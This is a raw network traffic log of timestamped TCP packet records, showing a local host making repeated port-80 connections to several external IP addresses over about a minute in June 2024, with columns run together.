                                                                            Jun 19, 2024 22:41:13.108319998 CEST804977935.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:13.108342886 CEST804977935.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:13.108360052 CEST804977935.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:13.108392954 CEST804977935.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:13.108407974 CEST804977935.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:13.108418941 CEST4977980192.168.2.435.214.235.206
                                                                            Jun 19, 2024 22:41:13.108419895 CEST4977980192.168.2.435.214.235.206
                                                                            Jun 19, 2024 22:41:13.108419895 CEST4977980192.168.2.435.214.235.206
                                                                            Jun 19, 2024 22:41:13.108457088 CEST804977935.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:13.108551025 CEST4977980192.168.2.435.214.235.206
                                                                            Jun 19, 2024 22:41:13.108551025 CEST4977980192.168.2.435.214.235.206
                                                                            Jun 19, 2024 22:41:13.113504887 CEST804977935.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:13.113542080 CEST804977935.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:13.113567114 CEST804977935.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:13.113600016 CEST4977980192.168.2.435.214.235.206
                                                                            Jun 19, 2024 22:41:13.113770962 CEST804977935.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:13.113826990 CEST4977980192.168.2.435.214.235.206
                                                                            Jun 19, 2024 22:41:13.726068974 CEST4978080192.168.2.4162.241.253.174
                                                                            Jun 19, 2024 22:41:13.730961084 CEST8049780162.241.253.174192.168.2.4
                                                                            Jun 19, 2024 22:41:13.734174013 CEST4978080192.168.2.4162.241.253.174
                                                                            Jun 19, 2024 22:41:13.738082886 CEST4978080192.168.2.4162.241.253.174
                                                                            Jun 19, 2024 22:41:13.742952108 CEST8049780162.241.253.174192.168.2.4
                                                                            Jun 19, 2024 22:41:14.002206087 CEST4977980192.168.2.435.214.235.206
                                                                            Jun 19, 2024 22:41:14.959733009 CEST8049780162.241.253.174192.168.2.4
                                                                            Jun 19, 2024 22:41:15.002038956 CEST4978080192.168.2.4162.241.253.174
                                                                            Jun 19, 2024 22:41:15.022465944 CEST4978180192.168.2.435.214.235.206
                                                                            Jun 19, 2024 22:41:15.029165983 CEST804978135.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:15.029369116 CEST4978180192.168.2.435.214.235.206
                                                                            Jun 19, 2024 22:41:15.031759024 CEST4978180192.168.2.435.214.235.206
                                                                            Jun 19, 2024 22:41:15.038172007 CEST804978135.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:15.038201094 CEST804978135.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:15.038232088 CEST804978135.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:15.038248062 CEST804978135.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:15.038266897 CEST804978135.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:15.039758921 CEST804978135.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:15.039777994 CEST804978135.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:15.039805889 CEST804978135.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:15.039834023 CEST804978135.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:15.718842030 CEST804978135.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:15.718877077 CEST804978135.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:15.718902111 CEST804978135.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:15.718950987 CEST4978180192.168.2.435.214.235.206
                                                                            Jun 19, 2024 22:41:15.719018936 CEST804978135.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:15.719041109 CEST804978135.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:15.719068050 CEST804978135.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:15.719101906 CEST804978135.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:15.719104052 CEST4978180192.168.2.435.214.235.206
                                                                            Jun 19, 2024 22:41:15.719125986 CEST804978135.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:15.719131947 CEST4978180192.168.2.435.214.235.206
                                                                            Jun 19, 2024 22:41:15.719146013 CEST804978135.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:15.719172955 CEST804978135.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:15.719185114 CEST4978180192.168.2.435.214.235.206
                                                                            Jun 19, 2024 22:41:15.719248056 CEST4978180192.168.2.435.214.235.206
                                                                            Jun 19, 2024 22:41:15.724261045 CEST804978135.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:15.724296093 CEST804978135.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:15.724320889 CEST804978135.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:15.724370956 CEST4978180192.168.2.435.214.235.206
                                                                            Jun 19, 2024 22:41:15.724456072 CEST4978180192.168.2.435.214.235.206
                                                                            Jun 19, 2024 22:41:16.533415079 CEST4978180192.168.2.435.214.235.206
                                                                            Jun 19, 2024 22:41:17.552387953 CEST4978280192.168.2.435.214.235.206
                                                                            Jun 19, 2024 22:41:17.559609890 CEST804978235.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:17.562175989 CEST4978280192.168.2.435.214.235.206
                                                                            Jun 19, 2024 22:41:17.565459967 CEST4978280192.168.2.435.214.235.206
                                                                            Jun 19, 2024 22:41:17.572359085 CEST804978235.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:18.200786114 CEST804978235.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:18.200808048 CEST804978235.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:18.200848103 CEST804978235.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:18.200865984 CEST804978235.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:18.200890064 CEST804978235.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:18.200913906 CEST804978235.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:18.200938940 CEST804978235.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:18.201052904 CEST4978280192.168.2.435.214.235.206
                                                                            Jun 19, 2024 22:41:18.201052904 CEST4978280192.168.2.435.214.235.206
                                                                            Jun 19, 2024 22:41:18.201262951 CEST804978235.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:18.201277971 CEST804978235.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:18.201306105 CEST804978235.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:18.201339006 CEST4978280192.168.2.435.214.235.206
                                                                            Jun 19, 2024 22:41:18.202126980 CEST4978280192.168.2.435.214.235.206
                                                                            Jun 19, 2024 22:41:18.208102942 CEST804978235.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:18.208266973 CEST804978235.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:18.210179090 CEST4978280192.168.2.435.214.235.206
                                                                            Jun 19, 2024 22:41:18.287427902 CEST804978235.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:18.287463903 CEST804978235.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:18.287486076 CEST804978235.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:18.287718058 CEST4978280192.168.2.435.214.235.206
                                                                            Jun 19, 2024 22:41:18.287764072 CEST804978235.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:18.287838936 CEST804978235.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:18.287863016 CEST804978235.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:18.287895918 CEST4978280192.168.2.435.214.235.206
                                                                            Jun 19, 2024 22:41:18.288939953 CEST804978235.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:18.288986921 CEST804978235.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:18.289005041 CEST804978235.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:18.289036989 CEST4978280192.168.2.435.214.235.206
                                                                            Jun 19, 2024 22:41:18.289071083 CEST804978235.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:18.289091110 CEST804978235.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:18.289170980 CEST4978280192.168.2.435.214.235.206
                                                                            Jun 19, 2024 22:41:18.289720058 CEST804978235.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:18.289798975 CEST804978235.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:18.289819956 CEST804978235.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:18.289854050 CEST4978280192.168.2.435.214.235.206
                                                                            Jun 19, 2024 22:41:18.290174007 CEST4978280192.168.2.435.214.235.206
                                                                            Jun 19, 2024 22:41:18.290502071 CEST804978235.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:18.290561914 CEST804978235.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:18.290580988 CEST804978235.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:18.290672064 CEST4978280192.168.2.435.214.235.206
                                                                            Jun 19, 2024 22:41:18.291291952 CEST804978235.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:18.291356087 CEST804978235.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:18.291373968 CEST804978235.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:18.291410923 CEST4978280192.168.2.435.214.235.206
                                                                            Jun 19, 2024 22:41:18.292092085 CEST804978235.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:18.292157888 CEST804978235.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:18.292393923 CEST4978280192.168.2.435.214.235.206
                                                                            Jun 19, 2024 22:41:18.292618990 CEST804978235.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:18.292638063 CEST804978235.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:18.294102907 CEST4978280192.168.2.435.214.235.206
                                                                            Jun 19, 2024 22:41:18.380467892 CEST804978235.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:18.380517006 CEST804978235.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:18.380537033 CEST804978235.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:18.380606890 CEST804978235.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:18.380625963 CEST804978235.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:18.380641937 CEST4978280192.168.2.435.214.235.206
                                                                            Jun 19, 2024 22:41:18.380647898 CEST804978235.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:18.380673885 CEST804978235.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:18.380682945 CEST4978280192.168.2.435.214.235.206
                                                                            Jun 19, 2024 22:41:18.380705118 CEST4978280192.168.2.435.214.235.206
                                                                            Jun 19, 2024 22:41:18.380873919 CEST804978235.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:18.380892992 CEST804978235.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:18.380918026 CEST804978235.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:18.380928993 CEST4978280192.168.2.435.214.235.206
                                                                            Jun 19, 2024 22:41:18.380934954 CEST804978235.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:18.380971909 CEST4978280192.168.2.435.214.235.206
                                                                            Jun 19, 2024 22:41:18.381289959 CEST804978235.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:18.381371021 CEST804978235.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:18.381390095 CEST804978235.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:18.381406069 CEST4978280192.168.2.435.214.235.206
                                                                            Jun 19, 2024 22:41:18.381479025 CEST804978235.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:18.381485939 CEST4978280192.168.2.435.214.235.206
                                                                            Jun 19, 2024 22:41:18.381494045 CEST804978235.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:18.381731033 CEST4978280192.168.2.435.214.235.206
                                                                            Jun 19, 2024 22:41:18.381812096 CEST804978235.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:18.381831884 CEST804978235.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:18.381903887 CEST4978280192.168.2.435.214.235.206
                                                                            Jun 19, 2024 22:41:18.381939888 CEST804978235.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:18.381954908 CEST804978235.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:18.381982088 CEST804978235.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:18.382003069 CEST804978235.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:18.382025003 CEST804978235.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:18.382026911 CEST4978280192.168.2.435.214.235.206
                                                                            Jun 19, 2024 22:41:18.382158995 CEST4978280192.168.2.435.214.235.206
                                                                            Jun 19, 2024 22:41:18.382216930 CEST804978235.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:18.382234097 CEST804978235.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:18.382301092 CEST4978280192.168.2.435.214.235.206
                                                                            Jun 19, 2024 22:41:18.382747889 CEST804978235.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:18.382816076 CEST804978235.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:18.382829905 CEST804978235.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:18.382853985 CEST4978280192.168.2.435.214.235.206
                                                                            Jun 19, 2024 22:41:18.382977962 CEST804978235.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:18.382993937 CEST804978235.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:18.383011103 CEST4978280192.168.2.435.214.235.206
                                                                            Jun 19, 2024 22:41:18.383022070 CEST804978235.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:18.383047104 CEST804978235.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:18.383090019 CEST4978280192.168.2.435.214.235.206
                                                                            Jun 19, 2024 22:41:18.383177042 CEST4978280192.168.2.435.214.235.206
                                                                            Jun 19, 2024 22:41:18.383218050 CEST804978235.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:18.383240938 CEST804978235.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:18.383615971 CEST4978280192.168.2.435.214.235.206
                                                                            Jun 19, 2024 22:41:18.383665085 CEST804978235.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:18.383804083 CEST804978235.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:18.386183977 CEST4978280192.168.2.435.214.235.206
                                                                            Jun 19, 2024 22:41:18.388436079 CEST4978280192.168.2.435.214.235.206
                                                                            Jun 19, 2024 22:41:18.393374920 CEST804978235.214.235.206192.168.2.4
                                                                            Jun 19, 2024 22:41:19.960275888 CEST8049780162.241.253.174192.168.2.4
                                                                            Jun 19, 2024 22:41:19.960546017 CEST4978080192.168.2.4162.241.253.174
                                                                            Jun 19, 2024 22:41:19.961632013 CEST4978080192.168.2.4162.241.253.174
                                                                            Jun 19, 2024 22:41:19.966773987 CEST8049780162.241.253.174192.168.2.4
                                                                            Jun 19, 2024 22:41:30.188328028 CEST4978380192.168.2.4202.95.21.152
                                                                            Jun 19, 2024 22:41:30.193398952 CEST8049783202.95.21.152192.168.2.4
                                                                            Jun 19, 2024 22:41:30.194156885 CEST4978380192.168.2.4202.95.21.152
                                                                            Jun 19, 2024 22:41:30.198082924 CEST4978380192.168.2.4202.95.21.152
                                                                            Jun 19, 2024 22:41:30.202867985 CEST8049783202.95.21.152192.168.2.4
                                                                            Jun 19, 2024 22:41:31.101912975 CEST8049783202.95.21.152192.168.2.4
                                                                            Jun 19, 2024 22:41:31.101955891 CEST8049783202.95.21.152192.168.2.4
                                                                            Jun 19, 2024 22:41:31.102009058 CEST4978380192.168.2.4202.95.21.152
                                                                            Jun 19, 2024 22:41:31.706059933 CEST4978380192.168.2.4202.95.21.152
                                                                            Jun 19, 2024 22:41:31.764624119 CEST4978480192.168.2.418.178.206.118
                                                                            Jun 19, 2024 22:41:31.769558907 CEST804978418.178.206.118192.168.2.4
                                                                            Jun 19, 2024 22:41:31.769645929 CEST4978480192.168.2.418.178.206.118
                                                                            Jun 19, 2024 22:41:31.772403002 CEST4978480192.168.2.418.178.206.118
                                                                            Jun 19, 2024 22:41:31.777301073 CEST804978418.178.206.118192.168.2.4
                                                                            Jun 19, 2024 22:41:32.572886944 CEST804978418.178.206.118192.168.2.4
                                                                            Jun 19, 2024 22:41:32.572930098 CEST804978418.178.206.118192.168.2.4
                                                                            Jun 19, 2024 22:41:32.573023081 CEST4978480192.168.2.418.178.206.118
                                                                            Jun 19, 2024 22:41:32.726754904 CEST4978580192.168.2.4202.95.21.152
                                                                            Jun 19, 2024 22:41:32.731800079 CEST8049785202.95.21.152192.168.2.4
                                                                            Jun 19, 2024 22:41:32.731889009 CEST4978580192.168.2.4202.95.21.152
                                                                            Jun 19, 2024 22:41:32.734376907 CEST4978580192.168.2.4202.95.21.152
                                                                            Jun 19, 2024 22:41:32.739255905 CEST8049785202.95.21.152192.168.2.4
                                                                            Jun 19, 2024 22:41:33.283447981 CEST4978480192.168.2.418.178.206.118
                                                                            Jun 19, 2024 22:41:33.761301041 CEST8049785202.95.21.152192.168.2.4
                                                                            Jun 19, 2024 22:41:33.762130976 CEST8049785202.95.21.152192.168.2.4
                                                                            Jun 19, 2024 22:41:33.766185045 CEST4978580192.168.2.4202.95.21.152
                                                                            Jun 19, 2024 22:41:34.238054037 CEST4978580192.168.2.4202.95.21.152
                                                                            Jun 19, 2024 22:41:34.306056023 CEST4978680192.168.2.418.178.206.118
                                                                            Jun 19, 2024 22:41:34.310950994 CEST804978618.178.206.118192.168.2.4
                                                                            Jun 19, 2024 22:41:34.314172029 CEST4978680192.168.2.418.178.206.118
                                                                            Jun 19, 2024 22:41:34.315742970 CEST4978680192.168.2.418.178.206.118
                                                                            Jun 19, 2024 22:41:34.321544886 CEST804978618.178.206.118192.168.2.4
                                                                            Jun 19, 2024 22:41:35.131256104 CEST804978618.178.206.118192.168.2.4
                                                                            Jun 19, 2024 22:41:35.132047892 CEST804978618.178.206.118192.168.2.4
                                                                            Jun 19, 2024 22:41:35.132114887 CEST4978680192.168.2.418.178.206.118
                                                                            Jun 19, 2024 22:41:35.256942034 CEST4978780192.168.2.4202.95.21.152
                                                                            Jun 19, 2024 22:41:35.272150040 CEST8049787202.95.21.152192.168.2.4
                                                                            Jun 19, 2024 22:41:35.272231102 CEST4978780192.168.2.4202.95.21.152
                                                                            Jun 19, 2024 22:41:35.274821997 CEST4978780192.168.2.4202.95.21.152
                                                                            Jun 19, 2024 22:41:35.280586004 CEST8049787202.95.21.152192.168.2.4
                                                                            Jun 19, 2024 22:41:35.280616045 CEST8049787202.95.21.152192.168.2.4
                                                                            Jun 19, 2024 22:41:35.280992985 CEST8049787202.95.21.152192.168.2.4
                                                                            Jun 19, 2024 22:41:35.281069040 CEST8049787202.95.21.152192.168.2.4
                                                                            Jun 19, 2024 22:41:35.281099081 CEST8049787202.95.21.152192.168.2.4
                                                                            Jun 19, 2024 22:41:35.281126022 CEST8049787202.95.21.152192.168.2.4
                                                                            Jun 19, 2024 22:41:35.281153917 CEST8049787202.95.21.152192.168.2.4
                                                                            Jun 19, 2024 22:41:35.281181097 CEST8049787202.95.21.152192.168.2.4
                                                                            Jun 19, 2024 22:41:35.281208992 CEST8049787202.95.21.152192.168.2.4
                                                                            Jun 19, 2024 22:41:35.834096909 CEST4978680192.168.2.418.178.206.118
                                                                            Jun 19, 2024 22:41:36.278764963 CEST8049787202.95.21.152192.168.2.4
                                                                            Jun 19, 2024 22:41:36.278804064 CEST8049787202.95.21.152192.168.2.4
                                                                            Jun 19, 2024 22:41:36.278875113 CEST4978780192.168.2.4202.95.21.152
                                                                            Jun 19, 2024 22:41:36.783483028 CEST4978780192.168.2.4202.95.21.152
                                                                            Jun 19, 2024 22:41:36.848974943 CEST4978880192.168.2.418.178.206.118
                                                                            Jun 19, 2024 22:41:36.856069088 CEST804978818.178.206.118192.168.2.4
                                                                            Jun 19, 2024 22:41:36.856139898 CEST4978880192.168.2.418.178.206.118
                                                                            Jun 19, 2024 22:41:36.858357906 CEST4978880192.168.2.418.178.206.118
                                                                            Jun 19, 2024 22:41:36.863471031 CEST804978818.178.206.118192.168.2.4
                                                                            Jun 19, 2024 22:41:36.863504887 CEST804978818.178.206.118192.168.2.4
                                                                            Jun 19, 2024 22:41:36.863554955 CEST804978818.178.206.118192.168.2.4
                                                                            Jun 19, 2024 22:41:36.863583088 CEST804978818.178.206.118192.168.2.4
                                                                            Jun 19, 2024 22:41:36.863610029 CEST804978818.178.206.118192.168.2.4
                                                                            Jun 19, 2024 22:41:36.863636017 CEST804978818.178.206.118192.168.2.4
                                                                            Jun 19, 2024 22:41:36.863662958 CEST804978818.178.206.118192.168.2.4
                                                                            Jun 19, 2024 22:41:36.863689899 CEST804978818.178.206.118192.168.2.4
                                                                            Jun 19, 2024 22:41:36.865567923 CEST804978818.178.206.118192.168.2.4
                                                                            Jun 19, 2024 22:41:37.651166916 CEST804978818.178.206.118192.168.2.4
                                                                            Jun 19, 2024 22:41:37.651324034 CEST804978818.178.206.118192.168.2.4
                                                                            Jun 19, 2024 22:41:37.654165030 CEST4978880192.168.2.418.178.206.118
                                                                            Jun 19, 2024 22:41:37.802061081 CEST4978980192.168.2.4202.95.21.152
                                                                            Jun 19, 2024 22:41:37.807255030 CEST8049789202.95.21.152192.168.2.4
                                                                            Jun 19, 2024 22:41:37.807337046 CEST4978980192.168.2.4202.95.21.152
                                                                            Jun 19, 2024 22:41:37.810060024 CEST4978980192.168.2.4202.95.21.152
                                                                            Jun 19, 2024 22:41:37.815026999 CEST8049789202.95.21.152192.168.2.4
                                                                            Jun 19, 2024 22:41:38.362057924 CEST4978880192.168.2.418.178.206.118
                                                                            Jun 19, 2024 22:41:38.812927008 CEST8049789202.95.21.152192.168.2.4
                                                                            Jun 19, 2024 22:41:38.812973022 CEST8049789202.95.21.152192.168.2.4
                                                                            Jun 19, 2024 22:41:38.813065052 CEST4978980192.168.2.4202.95.21.152
                                                                            Jun 19, 2024 22:41:38.817024946 CEST4978980192.168.2.4202.95.21.152
                                                                            Jun 19, 2024 22:41:38.822746992 CEST8049789202.95.21.152192.168.2.4
                                                                            Jun 19, 2024 22:41:39.380981922 CEST4979080192.168.2.418.178.206.118
                                                                            Jun 19, 2024 22:41:39.386260033 CEST804979018.178.206.118192.168.2.4
                                                                            Jun 19, 2024 22:41:39.386343956 CEST4979080192.168.2.418.178.206.118
                                                                            Jun 19, 2024 22:41:39.388326883 CEST4979080192.168.2.418.178.206.118
                                                                            Jun 19, 2024 22:41:39.393188000 CEST804979018.178.206.118192.168.2.4
                                                                            Jun 19, 2024 22:41:40.164597034 CEST804979018.178.206.118192.168.2.4
                                                                            Jun 19, 2024 22:41:40.164650917 CEST804979018.178.206.118192.168.2.4
                                                                            Jun 19, 2024 22:41:40.164803028 CEST4979080192.168.2.418.178.206.118
                                                                            Jun 19, 2024 22:41:40.170069933 CEST4979080192.168.2.418.178.206.118
                                                                            Jun 19, 2024 22:41:40.174932003 CEST804979018.178.206.118192.168.2.4
                                                                            Jun 19, 2024 22:41:45.464380980 CEST4979180192.168.2.466.96.162.149
                                                                            Jun 19, 2024 22:41:45.469626904 CEST804979166.96.162.149192.168.2.4
                                                                            Jun 19, 2024 22:41:45.469698906 CEST4979180192.168.2.466.96.162.149
                                                                            Jun 19, 2024 22:41:45.471657991 CEST4979180192.168.2.466.96.162.149
                                                                            Jun 19, 2024 22:41:45.477345943 CEST804979166.96.162.149192.168.2.4
                                                                            Jun 19, 2024 22:41:45.979161024 CEST804979166.96.162.149192.168.2.4
                                                                            Jun 19, 2024 22:41:45.979302883 CEST804979166.96.162.149192.168.2.4
                                                                            Jun 19, 2024 22:41:45.979434967 CEST4979180192.168.2.466.96.162.149
                                                                            Jun 19, 2024 22:41:46.986454010 CEST4979180192.168.2.466.96.162.149
                                                                            Jun 19, 2024 22:41:48.004790068 CEST4979280192.168.2.466.96.162.149
                                                                            Jun 19, 2024 22:41:48.009908915 CEST804979266.96.162.149192.168.2.4
                                                                            Jun 19, 2024 22:41:48.012258053 CEST4979280192.168.2.466.96.162.149
                                                                            Jun 19, 2024 22:41:48.016074896 CEST4979280192.168.2.466.96.162.149
                                                                            Jun 19, 2024 22:41:48.021065950 CEST804979266.96.162.149192.168.2.4
                                                                            Jun 19, 2024 22:41:48.510469913 CEST804979266.96.162.149192.168.2.4
                                                                            Jun 19, 2024 22:41:48.510822058 CEST804979266.96.162.149192.168.2.4
                                                                            Jun 19, 2024 22:41:48.512248993 CEST4979280192.168.2.466.96.162.149
                                                                            Jun 19, 2024 22:41:49.517678022 CEST4979280192.168.2.466.96.162.149
                                                                            Jun 19, 2024 22:41:50.537086010 CEST4979380192.168.2.466.96.162.149
                                                                            Jun 19, 2024 22:41:50.542437077 CEST804979366.96.162.149192.168.2.4
                                                                            Jun 19, 2024 22:41:50.546178102 CEST4979380192.168.2.466.96.162.149
                                                                            Jun 19, 2024 22:41:50.549124002 CEST4979380192.168.2.466.96.162.149
                                                                            Jun 19, 2024 22:41:50.554066896 CEST804979366.96.162.149192.168.2.4
                                                                            Jun 19, 2024 22:41:50.554125071 CEST804979366.96.162.149192.168.2.4
                                                                            Jun 19, 2024 22:41:50.554153919 CEST804979366.96.162.149192.168.2.4
                                                                            Jun 19, 2024 22:41:50.554179907 CEST804979366.96.162.149192.168.2.4
                                                                            Jun 19, 2024 22:41:50.554277897 CEST804979366.96.162.149192.168.2.4
                                                                            Jun 19, 2024 22:41:50.554388046 CEST804979366.96.162.149192.168.2.4
                                                                            Jun 19, 2024 22:41:50.554423094 CEST804979366.96.162.149192.168.2.4
                                                                            Jun 19, 2024 22:41:50.554450035 CEST804979366.96.162.149192.168.2.4
                                                                            Jun 19, 2024 22:41:50.554512978 CEST804979366.96.162.149192.168.2.4
                                                                            Jun 19, 2024 22:41:51.661393881 CEST804979366.96.162.149192.168.2.4
                                                                            Jun 19, 2024 22:41:51.661433935 CEST804979366.96.162.149192.168.2.4
                                                                            Jun 19, 2024 22:41:51.662146091 CEST4979380192.168.2.466.96.162.149
                                                                            Jun 19, 2024 22:41:51.946058035 CEST4979480192.168.2.466.29.145.248
                                                                            Jun 19, 2024 22:41:51.951082945 CEST804979466.29.145.248192.168.2.4
                                                                            Jun 19, 2024 22:41:51.952131033 CEST4979480192.168.2.466.29.145.248
                                                                            Jun 19, 2024 22:41:51.953722954 CEST4979480192.168.2.466.29.145.248
                                                                            Jun 19, 2024 22:41:51.958687067 CEST804979466.29.145.248192.168.2.4
                                                                            Jun 19, 2024 22:41:52.048994064 CEST4979380192.168.2.466.96.162.149
                                                                            Jun 19, 2024 22:41:52.564507008 CEST804979466.29.145.248192.168.2.4
                                                                            Jun 19, 2024 22:41:52.564553976 CEST804979466.29.145.248192.168.2.4
                                                                            Jun 19, 2024 22:41:52.564721107 CEST4979480192.168.2.466.29.145.248
                                                                            Jun 19, 2024 22:41:53.067559958 CEST4979580192.168.2.466.96.162.149
                                                                            Jun 19, 2024 22:41:53.072901011 CEST804979566.96.162.149192.168.2.4
                                                                            Jun 19, 2024 22:41:53.072968960 CEST4979580192.168.2.466.96.162.149
                                                                            Jun 19, 2024 22:41:53.074821949 CEST4979580192.168.2.466.96.162.149
                                                                            Jun 19, 2024 22:41:53.080224991 CEST804979566.96.162.149192.168.2.4
                                                                            Jun 19, 2024 22:41:53.455171108 CEST4979480192.168.2.466.29.145.248
                                                                            Jun 19, 2024 22:41:53.542373896 CEST804979566.96.162.149192.168.2.4
                                                                            Jun 19, 2024 22:41:53.542668104 CEST804979566.96.162.149192.168.2.4
                                                                            Jun 19, 2024 22:41:53.542726040 CEST4979580192.168.2.466.96.162.149
                                                                            Jun 19, 2024 22:41:53.544738054 CEST4979580192.168.2.466.96.162.149
                                                                            Jun 19, 2024 22:41:53.550029039 CEST804979566.96.162.149192.168.2.4
                                                                            Jun 19, 2024 22:41:54.476742983 CEST4979680192.168.2.466.29.145.248
                                                                            Jun 19, 2024 22:41:54.482331038 CEST804979666.29.145.248192.168.2.4
                                                                            Jun 19, 2024 22:41:54.482439041 CEST4979680192.168.2.466.29.145.248
                                                                            Jun 19, 2024 22:41:54.484353065 CEST4979680192.168.2.466.29.145.248
                                                                            Jun 19, 2024 22:41:54.489694118 CEST804979666.29.145.248192.168.2.4
                                                                            Jun 19, 2024 22:41:55.095652103 CEST804979666.29.145.248192.168.2.4
                                                                            Jun 19, 2024 22:41:55.095737934 CEST804979666.29.145.248192.168.2.4
                                                                            Jun 19, 2024 22:41:55.095880985 CEST4979680192.168.2.466.29.145.248
                                                                            Jun 19, 2024 22:41:55.990061045 CEST4979680192.168.2.466.29.145.248
                                                                            Jun 19, 2024 22:41:57.005970001 CEST4979780192.168.2.466.29.145.248
                                                                            Jun 19, 2024 22:41:57.010837078 CEST804979766.29.145.248192.168.2.4
                                                                            Jun 19, 2024 22:41:57.010907888 CEST4979780192.168.2.466.29.145.248
                                                                            Jun 19, 2024 22:41:57.013468027 CEST4979780192.168.2.466.29.145.248
